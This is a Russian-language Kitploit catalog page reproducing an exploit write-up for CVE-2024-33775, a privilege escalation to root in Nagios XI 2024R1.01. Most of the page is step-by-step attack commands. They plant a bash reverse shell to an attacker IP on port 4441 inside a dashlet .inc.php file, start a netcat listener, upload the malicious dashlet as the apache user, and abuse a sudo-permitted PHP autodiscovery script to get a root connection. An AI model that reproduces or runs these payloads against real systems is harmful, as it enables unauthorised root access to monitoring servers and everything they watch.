Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-33775 — Эксплойт для повышения привилегий в Nagios XI 2024R1.01, позволяющий получить полный root-доступ от пользователей NAGIOS или APACHE через внедрение вредоносного RSS-виджета и выполнение команд sudo. | Kitploit
Инструменты/GitHubGitHub/neo-xed/cve-2024-33775
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubneo-xed/cve-2024-33775

CVE-2024-33775

Эксплойт для повышения привилегий в Nagios XI 2024R1.01, позволяющий получить полный root-доступ от пользователей NAGIOS или APACHE через внедрение вредоносного RSS-виджета и выполнение команд sudo.

Репозиторий
2 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE обнаружен: K. Wahab (Neo`X)

Детали уязвимости:

  • Продукт: Nagios XI Version 2024R1.01
  • Уязвимость: Повышение привилегий от пользователей "NAGIOS" или "APACHE"
  • Результат: Полный root-доступ к целевой системе
  • CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33775

Эксплойт:

RSS Dashlet используется в данном примере.

1. Создание нового экземпляра Nagios XI:

  • Вы можете загрузить файл OVA Nagios XI версии 2024R1.01 с: https://assets.nagios.com/downloads/nagiosxi/2024/ovf/nagiosxi-2024R1.0.1-64.ova

2. Повышение привилегий:

Эксплойт от имени NAGIOS:

  • Добавьте в файл dashlet .inc.php по пути "/usr/local/nagiosxi/html/includes/dashlets/" следующее содержимое:

    root@kitploit:~
    exec('/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1);
    
  • Запустите сервер прослушивания Netcat на машине атакующего:

    root@kitploit:~
    nc -nlvp 4441
    
  • Выполните следующую команду для повышения привилегий и получения подключения как root:

    root@kitploit:~
    sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
    

Эксплойт от имени APACHE:

  • Перейдите на страницу управления "dashlets" и загрузите Dashlet:

    root@kitploit:~
    http://TARGET_IP/nagiosxi/admin/dashlets.php?download=rss_dashlet
    
  • Измените *.inc.php:

    root@kitploit:~
    exec("sleep 30 && /bin/bash -c '/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1'");
    

    Dashlet_inc_php

  • Запустите сервер прослушивания Netcat на машине атакующего:

    root@kitploit:~
    nc -nlvp 4441
    
  • Загрузите вредоносный дашлет на страницу управления дашлетами и ожидайте подключения от имени пользователя APACHE.

  • Выполните следующую команду для повышения привилегий и получения подключения как root:

    root@kitploit:~
    sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
    

(Примечание: после выполнения команды вы получите подключение как APACHE, используйте CTRL+C для выхода и перезапустите слушатель несколько раз)

Apache_root

Скачать инструмент